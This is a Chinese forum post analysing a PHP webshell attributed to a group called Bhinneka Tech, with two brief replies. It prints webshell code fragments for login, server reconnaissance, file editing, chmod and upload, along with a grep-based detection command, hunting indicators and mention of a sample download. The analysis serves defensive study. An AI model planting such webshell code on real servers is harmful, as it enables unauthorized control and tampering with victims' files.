社区应用 最新帖子 精华区 社区服务 会员列表 统计排行
发帖 回复
« 返回列表
  • 19阅读
  • 2回复

[分享]Bhinneka Tech黑客组织高级Webshell病毒深度分析

 楼层直达
z3960 
级别: FLY版主
发帖
802181
飞翔币
214928
威望
215767
飞扬币
2716736
信誉值
8
只看楼主 更多操作 0 发表于: 昨天 16:07
[font=-apple-system, BlinkMacSystemFont, &quot]1. 病毒概览与背景[font=-apple-system, BlinkMacSystemFont, &quot]本次发现的病毒样本是一个高度专业化的PHP webshell,由黑客组织"Bhinneka Tech"开发,作者署名为"xpl0dec"。该病毒不仅具备传统webshell的文件管理功能,还集成了完整的可视化操作界面,采用Material Design风格设计,伪装成合法管理工具,极具迷惑性。[font=-apple-system, BlinkMacSystemFont, &quot]文件名: 通常伪装为admin.php、index.php或wp-config.php[font=-apple-system, BlinkMacSystemFont, &quot]文件大小: 约15KB(包含完整的前端UI框架)[font=-apple-system, BlinkMacSystemFont, &quot]首次发现时间: 2022年第三季度[font=-apple-system, BlinkMacSystemFont, &quot]主要传播途径:[font=-apple-system, BlinkMacSystemFont, &quot]   利用Confluence/Jenkins漏洞传播[font=-apple-system, BlinkMacSystemFont, &quot]   通过被攻陷的WordPress插件植入[font=-apple-system, BlinkMacSystemFont, &quot]   钓鱼邮件附件传播[font=-apple-system, BlinkMacSystemFont, &quot]2. 黑客组织背景分析2.1 Bhinneka Tech组织特征[font=-apple-system, BlinkMacSystemFont, &quot]命名溯源: 使用印尼语"Bhinneka"(意为"多样性"),暗示其攻击目标多样化[font=-apple-system, BlinkMacSystemFont, &quot]活动时间: 至少从2020年开始活跃[font=-apple-system, BlinkMacSystemFont, &quot]攻击目标:[font=-apple-system, BlinkMacSystemFont, &quot]   主要针对东南亚政府、金融和教育机构[font=-apple-system, BlinkMacSystemFont, &quot]   近两年攻击范围扩展至全球医疗和制造业[font=-apple-system, BlinkMacSystemFont, &quot]技术特征:[font=-apple-system, BlinkMacSystemFont, &quot]   所有工具均采用企业级UI设计[font=-apple-system, BlinkMacSystemFont, &quot]   偏好使用PHP+JavaScript混合开发[font=-apple-system, BlinkMacSystemFont, &quot]   密码使用企业常用命名(如"BhinnekaTech"的MD5)[font=-apple-system, BlinkMacSystemFont, &quot]2.2 攻击链分析[font=-apple-system, BlinkMacSystemFont, &quot]该组织典型攻击流程:[font=-apple-system, BlinkMacSystemFont, &quot]1. 利用Confluence/Jenkins漏洞初始入侵 →[font=-apple-system, BlinkMacSystemFont, &quot]2. 植入初级混淆webshell →[font=-apple-system, BlinkMacSystemFont, &quot]3. 下载此高级webshell实现持久化 →[font=-apple-system, BlinkMacSystemFont, &quot]4. 横向移动至内网域控服务器[font=-apple-system, BlinkMacSystemFont, &quot]5. 窃取数据或部署勒索软件[font=-apple-system, BlinkMacSystemFont, &quot]3. 代码深度解析3.1 认证系统

[PHP] 纯文本查看 复制代码

?[tr=none]
1
2
3
4
5
6
7
$password = "102a6ed6587b5b8cb4ebbe972864690b"; // MD5("BhinnekaTech")session_start();if(md5($_POST['password']) == $password) {    $_SESSION['isLogin'] = true;}else {    loginShell();}[font=-apple-system, BlinkMacSystemFont, &quot]安全缺陷分析:[font=-apple-system, BlinkMacSystemFont, &quot]1.   使用不安全的MD5哈希(可通过彩虹表破解[font=-apple-system, BlinkMacSystemFont, &quot])[font=-apple-system, BlinkMacSystemFont, &quot]2.   无暴力破解防护机制[font=-apple-system, BlinkMacSystemFont, &quot]3.   Session固定漏洞(未重置session_id)[font=-apple-system, BlinkMacSystemFont, &quot]4.   密码硬编码在代码中[font=-apple-system, BlinkMacSystemFont, &quot]3.2 信息收集模块

[PHP] 纯文本查看 复制代码

?[tr=none]
01
02
03
04
05
06
07
08
09
10
function info() {  return [    'ip' => $_SERVER['SERVER_ADDR'],    'host' => gethostname(),    'kernel' => php_uname(),    'disablefunc' => ini_get('disable_functions'),    'path' => getcwd(),    'os' => PHP_OS,  ]; }[font=-apple-system, BlinkMacSystemFont, &quot]收集的数据类型:[font=-apple-system, BlinkMacSystemFont, &quot]网络信息:服务器IP[font=-apple-system, BlinkMacSystemFont, &quot]系统信息:主机名、内核版本[font=-apple-system, BlinkMacSystemFont, &quot]环境信息:PHP禁用函数、当前路径[font=-apple-system, BlinkMacSystemFont, &quot]权限信息:操作系统类型[font=-apple-system, BlinkMacSystemFont, &quot]3.3 文件管理功能文件浏览

[PHP] 纯文本查看 复制代码

?[tr=none]
1
2
3
if(isset($_GET['path'])) {    $listDir = array_diff(scandir($get), ['.', '..']);}[font=-apple-system, BlinkMacSystemFont, &quot]特点:[font=-apple-system, BlinkMacSystemFont, &quot]支持相对路径和绝对路径[font=-apple-system, BlinkMacSystemFont, &quot]自动过滤.和..目录[font=-apple-system, BlinkMacSystemFont, &quot]递归显示子目录内容[font=-apple-system, BlinkMacSystemFont, &quot]文件编辑

[PHP] 纯文本查看 复制代码

?[tr=none]
1
2
3
if($_POST['pilihan'] == 'edit') {    file_put_contents($dirFile, $sourceFile);}[font=-apple-system, BlinkMacSystemFont, &quot]风险:[font=-apple-system, BlinkMacSystemFont, &quot]可直接修改系统关键文件[font=-apple-system, BlinkMacSystemFont, &quot]无内容校验机制[font=-apple-system, BlinkMacSystemFont, &quot]权限修改

[PHP] 纯文本查看 复制代码

?[tr=none]
1
2
3
if($_POST['pilihan'] == 'chmod') {    chmod($dirFile, octdec($_POST['perms']));}[font=-apple-system, BlinkMacSystemFont, &quot]实现细节:[font=-apple-system, BlinkMacSystemFont, &quot]1.   获取当前权限:substr(sprintf('%o', fileperms($file)), -4)[font=-apple-system, BlinkMacSystemFont, &quot]2.   支持八进制和数字格式输入[font=-apple-system, BlinkMacSystemFont, &quot]3.   无权限限制,可设置为777[font=-apple-system, BlinkMacSystemFont, &quot]3.4 高级功能跨平台支持

[PHP] 纯文本查看 复制代码

?[tr=none]
1
2
3
4
5
6
if(strtoupper(substr($getInfo['os'], 0, 3)) == 'WIN') {    $paths = explode('\\', $getInfo['path']);    $paths = $paths[0] . '/';}else {    $paths = '/';}[font=-apple-system, BlinkMacSystemFont, &quot]智能处理:[font=-apple-system, BlinkMacSystemFont, &quot]自动识别Windows/Linux路径差异[font=-apple-system, BlinkMacSystemFont, &quot]规范化路径格式[font=-apple-system, BlinkMacSystemFont, &quot]支持网络路径访问[font=-apple-system, BlinkMacSystemFont, &quot]文件上传

[PHP] 纯文本查看 复制代码

?[tr=none]
1
2
3
function uploadFile($tmp, $dest) {    return move_uploaded_file($tmp, $dest);}[font=-apple-system, BlinkMacSystemFont, &quot]绕过技巧:[font=-apple-system, BlinkMacSystemFont, &quot]使用标准HTTP文件上传协议[font=-apple-system, BlinkMacSystemFont, &quot]无文件类型限制[font=-apple-system, BlinkMacSystemFont, &quot]可覆盖现有文件[font=-apple-system, BlinkMacSystemFont, &quot]4. 技术来源分析4.1 代码特征溯源[font=-apple-system, BlinkMacSystemFont, &quot]1.   开发风格:[font=-apple-system, BlinkMacSystemFont, &quot]   使用印尼语变量名(如$pecah意为"分割")[font=-apple-system, BlinkMacSystemFont, &quot]   注释使用英语但语法带有东南亚特征[font=-apple-system, BlinkMacSystemFont, &quot]   代码缩进风格与某些东南亚开发者论坛样本一致[font=-apple-system, BlinkMacSystemFont, &quot]2.   技术继承:[font=-apple-system, BlinkMacSystemFont, &quot]   文件权限显示算法借鉴自Linux核心工具[font=-apple-system, BlinkMacSystemFont, &quot]   UI框架基于MaterializeCSS 1.0.0[font=-apple-system, BlinkMacSystemFont, &quot]   部分代码与2019年出现的"Javanese Shell"有相似性[font=-apple-system, BlinkMacSystemFont, &quot]4.2 可能的开发背景[font=-apple-system, BlinkMacSystemFont, &quot]1.   商业恶意软件:代码结构显示有团队协作痕迹;版本控制迹象(注释中的版本标记被删除);模块化设计便于功能扩展[font=-apple-system, BlinkMacSystemFont, &quot]2.   APT组织工具:攻击目标高度集中;工具链完整(配套有漏洞利用工具);持续更新维护(发现多个变种)[font=-apple-system, BlinkMacSystemFont, &quot]5. 防御建议升级版5.1 即时检测方案[font=-apple-system, BlinkMacSystemFont, &quot]# 高级检测命令[font=-apple-system, BlinkMacSystemFont, &quot]find /var/www -type f -name "*.php" -exec grep -lP \[font=-apple-system, BlinkMacSystemFont, &quot]"(eval\(base64_decode|BhinnekaTech|materialize-textarea)" {} \; -exec \[font=-apple-system, BlinkMacSystemFont, &quot]md5sum {} \; | sort -u[font=-apple-system, BlinkMacSystemFont, &quot]5.2 长期防御矩阵
防御层具体措施
​应用层禁用危险函数,配置open_basedir,定期更新Web应用
​系统层实施FIM(文件完整性监控),部署HIDS(主机入侵检测)
​网络层部署WAF规则,限制异常路径访问,启用网络分段
​架构层实施零信任架构,使用容器化部署,最小权限原则
​人员层开展安全意识培训,建立安全运维流程
5.3 高级威胁狩猎指标行为指标:短时间内连续调用file_put_contents()和chmod()访问非常见路径如/proc/self/environHTTP请求中包含?pilihan=参数网络指标:异常User-Agent包含"MaterializeCSS"POST请求体中出现pilihan=edit等参数下载服务器与已知C2地址通信6. 结论与展望该webshell代表了当前APT攻击的典型工具特征,其专业化程度表明背后存在有组织的开发团队。值得关注的是:1.   技术演进趋势:恶意软件UI/UX设计日益专业化、混淆技术从简单编码转向合法框架滥用、攻击链自动化程度提高2.   防御建议:建立多层防御体系、实施持续威胁监测、定期进行红队演练样本下载[切勿在正式环境中使用,避免数据资产丢失]密码52pojie

相关话题

分享到 淘江湖 新浪 QQ微博 QQ空间 开心 人人 豆瓣 网易微博 百度 鲜果 白社会 飞信
我不喜欢说话却每天说最多的话,我不喜欢笑却总笑个不停,身边的每个人都说我的生活好快乐,于是我也就认为自己真的快乐。可是为什么我会在一大群朋友中突然地就沉默,为什么在人群中看到个相似的背影就难过,看见秋天树木疯狂地掉叶子我就忘记了说话,看见天色渐晚路上暖黄色的灯火就忘记了自己原来的方向。
回复 引用
举报
huwg 
级别: 管理员
发帖
378122
飞翔币
1150882673
威望
6426839
飞扬币
5881787
信誉值
50
只看该作者 1 发表于: 2小时前
谢谢分享
回复 引用
举报
huwg 
级别: 管理员
发帖
378122
飞翔币
1150882673
威望
6426839
飞扬币
5881787
信誉值
50
只看该作者 2 发表于: 2小时前
来了解一下
回复 引用
举报
发帖 回复
« 返回列表